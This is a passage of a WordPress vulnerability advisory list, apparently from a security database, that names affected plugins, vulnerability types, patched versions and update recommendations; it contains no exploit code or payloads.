Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: WP People

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Custom Field Template

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 2.5.8
Recommended Action: Update to version 2.5.8, or a newer patched version

Plugin: Coupon Tab for DirectoryPress (pp-coupon-tab)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Hubbub Lite – Fast, Reliable Social Sharing Buttons

Vulnerability: Missing Authorization via multiple admin_init actions
Patched Version: 1.30.1
Recommended Action: Update to version 1.30.1, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: Missing Authorization to Arbitrary User Deletion
Patched Version: 3.8.1.3
Recommended Action: Update to version 3.8.1.3, or a newer patched version

Plugin: new-year-firework

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Stored Cross-Site Scripting via accessibility-helper Title
Patched Version: 3.7.10
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.10, 3.8.10, 3.9.8, 4.0.7, 4.1.7, 4.2.4

Plugin: Login with TOTP (Google Authenticator, Microsoft Authenticator)

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Unlimited Elements For Elementor (Free Widgets, Addons, Templates)

Vulnerability: Authenticated (Admin+) Cross-Site Scripting (XSS)
Patched Version: 1.5.49
Recommended Action: Update to version 1.5.49, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: Slick Contact Forms

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: spider-calendar

Vulnerability: Multiple Vulnerabilities
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Zephyr Project Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.41
Recommended Action: Update to one of the following versions, or a newer patched version: 3.2.41, 3.2.5

Plugin: Dashicons + Custom Post Types

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Smart Import : Import any XML File to WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: WP LESS to CSS

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Register Plus

Vulnerability: Sensitive Information Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form 7 Database Addon – CFDB7

Vulnerability: SQL Injection
Patched Version: 1.2.5.4
Recommended Action: Update to version 1.2.5.4, or a newer patched version

Plugin: Limit Login Attempts Plus – WordPress Limit Login Attempts By Felix

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Securimage-WP

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.5.1
Recommended Action: Update to version 3.5.1, or a newer patched version

Plugin: PowerPack Elementor Addons (Free Widgets, Extensions and Templates)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.6.2
Recommended Action: Update to version 2.6.2, or a newer patched version

Plugin: Popup Box – Create Countdown, Coupon, Video, Contact Form Popups

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.8.7
Recommended Action: Update to version 3.8.7, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Donation Plugin <= 2.33.0
Patched Version: 2.33.1
Recommended Action: Update to version 2.33.1, or a newer patched version

Plugin: WordPress Flipbook by Supsystic

Vulnerability: Cross-Site Request Forgery via AJAX action
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: MicroPayments – Fans Paysite: Paid Creator Subscriptions, Digital Assets, Tokens Wallet

Vulnerability: Paid Author Subscriptions, Content, Downloads, Membership <= 1.9.5
Patched Version: 1.9.6
Recommended Action: Update to version 1.9.6, or a newer patched version

Plugin: Geo Controller

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.13.12
Recommended Action: Update to version 7.13.12, or a newer patched version

Plugin: The Events Calendar

Vulnerability: Cross-Site Scripting via tribe_paged Parameter
Patched Version: 4.8.2
Recommended Action: Update to version 4.8.2, or a newer patched version

Plugin: LearnDash LMS

Vulnerability: Authenticated (Subscriber+) Insecure Direct Object Reference to Arbitrary User Password Change
Patched Version: 4.6.0.1
Recommended Action: Update to version 4.6.0.1, or a newer patched version

Plugin: Elements For Elementor

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: DiveBook

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Fancy Product Designer

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 4.7.6
Recommended Action: Update to version 4.7.6, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: SQL Injection
Patched Version: 7.3.19.727
Recommended Action: Update to version 7.3.19.727, or a newer patched version

Plugin: Events

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Client Invoicing by Sprout Invoices – Easy Estimates and Invoices for WordPress

Vulnerability: Sensitive Information Exposure
Patched Version: 20.5.4
Recommended Action: Update to version 20.5.4, or a newer patched version

Plugin: Football Pool

Vulnerability: Cross-Site Scripting
Patched Version: 2.6.5
Recommended Action: Update to version 2.6.5, or a newer patched version

Plugin: GetResponse for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.5.21
Recommended Action: Update to version 5.5.21, or a newer patched version

Plugin: WordPress File Upload

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.19.2
Recommended Action: Update to version 4.19.2, or a newer patched version

Plugin: Welcart e-Commerce

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 2.9.5
Recommended Action: Update to version 2.9.5, or a newer patched version

Plugin: Ultimate Appointment Booking & Scheduling

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.10
Recommended Action: Update to version 1.1.10, or a newer patched version

Plugin: Contact Form Builder by vcita

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.9.13
Recommended Action: Update to version 1.9.13, or a newer patched version

Plugin: Gravity Forms

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.7.5
Recommended Action: Update to version 2.7.5, or a newer patched version

Plugin: Ubigeo de Perú para Woocommerce y WordPress

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.6.4
Recommended Action: Update to version 3.6.4, or a newer patched version

Plugin: Classified Listing – Classified ads & Business Directory Plugin

Vulnerability: Cross-Site Request Forgery via rtcl_ajax_thumbnail_delete
Patched Version: 2.4.6
Recommended Action: Update to version 2.4.6, or a newer patched version

Plugin: Users Ultra Membership, Users Community and Member Profiles With PayPal Integration Plugin

Vulnerability: Multiple SQL Injection
Patched Version: 1.5.16
Recommended Action: Update to version 1.5.16, or a newer patched version

Plugin: Zephyr Project Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3.94
Recommended Action: Update to version 3.3.94, or a newer patched version

Plugin: Advance Search for WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: aBitGone CommentSafe

Vulnerability: Cross-Site Request Forgery to Settings Update and Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Authenticated (Admin+) Server-Side Request Forgery via give_get_content_by_ajax_handler
Patched Version: 2.25.2
Recommended Action: Update to version 2.25.2, or a newer patched version

Plugin: WP Private Content Plus

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: BuddyPress Builder for Elementor – BuddyBuilder

Vulnerability: BuddyPress Builder for Elementor <= 1.7.3
Patched Version: 1.7.4
Recommended Action: Update to version 1.7.4, or a newer patched version

Plugin: LIQUID SPEECH BALLOON

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Custom Sidebars – Dynamic Sidebar Widget Area Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.0.2
Recommended Action: Update to version 2.1.0.2, or a newer patched version

Plugin: Social Sharing Plugin – Sassy Social Share

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.3.45
Recommended Action: Update to version 3.3.45, or a newer patched version

Plugin: Charitable – Donation Plugin for WordPress – Fundraising with Recurring Donations & More

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.6.51
Recommended Action: Update to version 1.6.51, or a newer patched version

Plugin: Creative Mail – Easier WordPress & WooCommerce Email Marketing

Vulnerability: Cross-Site Request Forgery to Plugin Deactivation
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Custom Post Type Generator

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Subpages Extended

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Analytics Insights – Google Analytics Dashboard for WordPress

Vulnerability: Open Redirect
Patched Version: 6.3
Recommended Action: Update to version 6.3, or a newer patched version

Plugin: Meks Easy Photo Feed Widget

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Tune Library

Vulnerability: SQL Injection
Patched Version: 1.5.5
Recommended Action: Update to version 1.5.5, or a newer patched version

Plugin: Schema – All In One Schema Rich Snippets

Vulnerability: All In One Schema Rich Snippets <= 1.6.5
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Network Settings Page
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: Delete Usermetas

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Featured Comments

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: SEO Plugin LiveOptim

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: File Upload Path Traversal
Patched Version: 1.5.75
Recommended Action: Update to version 1.5.75, or a newer patched version

Plugin: Super Store Finder

Vulnerability: Arbitrary File Upload
Patched Version: 6.2
Recommended Action: Update to version 6.2, or a newer patched version

Plugin: Real Testimonials – Testimonial Slider, Carousel, Grid | Collect Customer Reviews and Video Testimonial with Testimonial Form | Social Proof Reviews and Review Slider

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Price Table

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Custom Settings

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Security Question

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Print My Blog – Print, PDF, & eBook Converter WordPress Plugin

Vulnerability: Server-Side Request Forgery
Patched Version: 1.6.7
Recommended Action: Update to version 1.6.7, or a newer patched version

Plugin: Simple Giveaways – Grow your business, email lists and traffic with contests

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting via Form, Prize, and Sharing Method Fields
Patched Version: 2.45.1
Recommended Action: Update to version 2.45.1, or a newer patched version

Plugin: Brandfolder – Digital Asset Management Simplified.

Vulnerability: Local/Remote File Inclusion
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: AB Google Map Travel (AB-MAP)

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: Portfolio Responsive Gallery

Vulnerability: Blind SQL Injection
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: Add Local Avatar

Vulnerability: Cross-Site Request Forgery via manage_avatar_cache
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Authenticated Privilege Escalation
Patched Version: 4.6.0.4
Recommended Action: Update to version 4.6.0.4, or a newer patched version

Plugin: Spectra – WordPress Gutenberg Blocks

Vulnerability: Missing Authorization Checks
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Forym

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Bit File Manager – 100% Free & Open Source File Manager and Code Editor for WordPress

Vulnerability: Authenticated (Admin+) PHP Object Injection
Patched Version: 6.0
Recommended Action: Update to version 6.0, or a newer patched version

Plugin: Page Builder with Image Map by AZEXO

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 2.0.11
Recommended Action: Update to version 2.0.11, or a newer patched version

Plugin: Recover WooCommerce Cart Abandonment, Newsletter, Email Marketing, Marketing Automation By FunnelKit

Vulnerability: Missing Authorization
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: Custom Searchable Data Entry System

Vulnerability: Unauthenticated Database Wiping
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GoHero Store Customizer for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: Getnet Argentina para WooCommerce

Vulnerability: 0.0.4
Patched Version: 0.0.5
Recommended Action: Update to version 0.0.5, or a newer patched version

Plugin: Captchinoo, admin login page protection with Google recaptcha

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Installation/Activation
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Missing Capabilities Check
Patched Version: 5.3.6
Recommended Action: Update to version 5.3.6, or a newer patched version

Plugin: WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

Vulnerability: Missing Authorization to Admin Account and Ticket Creation
Patched Version: 2.7.10
Recommended Action: Update to version 2.7.10, or a newer patched version

Plugin: WordPress to Freshsales Integration

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.2.3
Recommended Action: Update to version 1.3.2.3, or a newer patched version

Plugin: HTML5 Responsive FAQ

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy)

Vulnerability: Stored Cross-Site Scripting
Patched Version: 7.2.0
Recommended Action: Update to version 7.2.0, or a newer patched version

Core: WordPress

Vulnerability: Arbitrary Page Modification
Patched Version: 3.7.18
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.18, 3.8.18, 3.9.16, 4.0.15, 4.1.15, 4.2.12, 4.3.8, 4.4.7, 4.5.6, 4.6.3, 4.7.2

Plugin: Material Design Icons for Page Builders

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Simple Calendar – Google Calendar Plugin

Vulnerability: Cross-Site Request Forgery to Transient Cache Clearing
Patched Version: 3.1.43
Recommended Action: Update to version 3.1.43, or a newer patched version

Plugin: External Links in New Window / New Tab

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.43
Recommended Action: Update to version 1.43, or a newer patched version

Plugin: FileBird – WordPress Media Library Folders & File Manager

Vulnerability: Unauthenticated SQL Injection
Patched Version: 4.7.4
Recommended Action: Update to version 4.7.4, or a newer patched version

Plugin: Export All URLs

Vulnerability: Arbitrary File Deletion
Patched Version: 4.4
Recommended Action: Update to version 4.4, or a newer patched version

Plugin: Kraken.io Image Optimizer

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Plugin Options Update
Patched Version: 2.6.8
Recommended Action: Update to version 2.6.8, or a newer patched version

Plugin: WP-Members Membership Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.8.1
Recommended Action: Update to version 3.2.8.1, or a newer patched version

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 5.9.6
Recommended Action: Update to version 5.9.6, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Authorization Bypass
Patched Version: 2.9.6
Recommended Action: Update to version 2.9.6, or a newer patched version

Plugin: WPFrom Email

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.8.9
Recommended Action: Update to version 1.8.9, or a newer patched version

Plugin: Csv2WPeC Coupon

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CardGate Payments for WooCommerce

Vulnerability: Lack of Origin Validation
Patched Version: 3.1.16
Recommended Action: Update to version 3.1.16, or a newer patched version

Plugin: Schedulicity – Easy Online Scheduling

Vulnerability: Unspecified Vulnerability (affects Easy Online Scheduling <= 2.21)
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: History Collection

Vulnerability: Arbitrary File Download
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 3.7.11
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.11, 3.8.11, 3.9.9, 4.0.8, 4.1.8, 4.2.5, 4.3.1

Plugin: WP Customer Reviews

Vulnerability: Authenticated (Subscriber+) Sensitive Information Exposure
Patched Version: 3.6.7
Recommended Action: Update to version 3.6.7, or a newer patched version

Plugin: WHMCS Bridge

Vulnerability: Unspecified Vulnerability
Patched Version: 6.3
Recommended Action: Update to version 6.3, or a newer patched version

Plugin: Countdown, Coming Soon, Maintenance – Countdown & Clock

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: CP Image Store with Slideshow

Vulnerability: Arbitrary File Download
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: Easy Social Feed – Social Photos Gallery – Post Feed – Like Box

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.2.7
Recommended Action: Update to version 6.2.7, or a newer patched version

Plugin: Mailtree Log Mail

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email Subject
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: yurl-retwitt

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Add Post URL

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: TablePress – Tables in WordPress made easy

Vulnerability: Authenticated (Author+) CSV Injection
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: DoLogin Security

Vulnerability: Missing Authorization on Dashboard Widget
Patched Version: 3.7.1
Recommended Action: Update to version 3.7.1, or a newer patched version

Plugin: Contact Form 7 Captcha

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.1.2
Recommended Action: Update to version 0.1.2, or a newer patched version

Plugin: IP Blacklist Cloud

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Frontier Post

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MultiVendorX – The Ultimate WooCommerce Multivendor Marketplace Solution

Vulnerability: Insecure Direct Object Reference
Patched Version: 3.7.4
Recommended Action: Update to version 3.7.4, or a newer patched version

Plugin: WP Roadmap – Product Feedback Board

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Inline Related Posts

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection via wp_user_id
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Plugin: Fancy Comments WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.2.11
Recommended Action: Update to version 1.2.11, or a newer patched version

Plugin: SVG Support

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: Enhanced Text Widget

Vulnerability: Missing Authorization via etw_hide_admin_notification_callback
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Authenticated (Subscriber+) Directory Traversal to Arbitrary File Write via qcld_openai_upload_pagetraining_file
Patched Version: 4.9.1
Recommended Action: Update to one of the following versions, or a newer patched version: 4.9.1, 4.9.3

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via mf_last_name shortcode
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: CSV Importer

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.3.9
Recommended Action: Update to version 0.3.9, or a newer patched version

Plugin: Poll Maker – Versus Polls, Anonymous Polls, Image Polls

Vulnerability: Unspecified Vulnerability
Patched Version: 3.2.9
Recommended Action: Update to version 3.2.9, or a newer patched version

Plugin: Social Media Widget by Acurax

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Astra Bulk Edit

Vulnerability: Missing Authorization
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: Peadig's Twitter Feed: Embedded Timeline WordPress Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GD bbPress Attachments

Vulnerability: Directory Traversal
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Nimble Page Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.2
Recommended Action: Update to version 3.2.2, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Local File Inclusion
Patched Version: 2.1.15
Recommended Action: Update to version 2.1.15, or a newer patched version

Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.9.56
Recommended Action: Update to version 0.9.56, or a newer patched version

Plugin: Fancy Gallery – WordPress plugin | Galleries

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Active Directory Integration / LDAP Integration

Vulnerability: Unauthenticated Information Disclosure
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: LOGIN AND REGISTRATION ATTEMPTS LIMIT

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Slideshow

Vulnerability: Cross-Site Scripting and Sensitive Information Disclosure
Patched Version: 2.1.13
Recommended Action: Update to version 2.1.13, or a newer patched version

Plugin: Chatbot with IBM watsonx Assistant

Vulnerability: Cross-Site Scripting
Patched Version: 0.8.21
Recommended Action: Update to version 0.8.21, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Server-Side Request Forgery
Patched Version: 6.5.3
Recommended Action: Update to version 6.5.3, or a newer patched version

Plugin: Post Grid and Gutenberg Blocks – ComboBlocks

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: Really Simple Guest Post

Vulnerability: Local File Inclusion
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: Super Store Finder

Vulnerability: SQL Injection
Patched Version: 6.5
Recommended Action: Update to version 6.5, or a newer patched version

Plugin: Anti-Spam: Spam Protection | Block Spam Users, Comments, Forms

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2021.9
Recommended Action: Update to version 2021.9, or a newer patched version

Plugin: WordPress Countdown Widget

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.1.9.2
Recommended Action: Update to version 3.1.9.2, or a newer patched version

Plugin: WPCHURCH – Church Management System for WordPress

Vulnerability: Unspecified Vulnerability (affects Church Management System for WordPress Theme releases before 13-07-2019)
Patched Version: 13-07-2019 (date-stamped release)
Recommended Action: Update to the 13-07-2019 release, or a newer patched version

Plugin: YASR – Yet Another Star Rating Plugin for WordPress

Vulnerability: Authenticated SQL Injection
Patched Version: 0.9.1
Recommended Action: Update to version 0.9.1, or a newer patched version

Plugin: Auto Rename Media On Upload

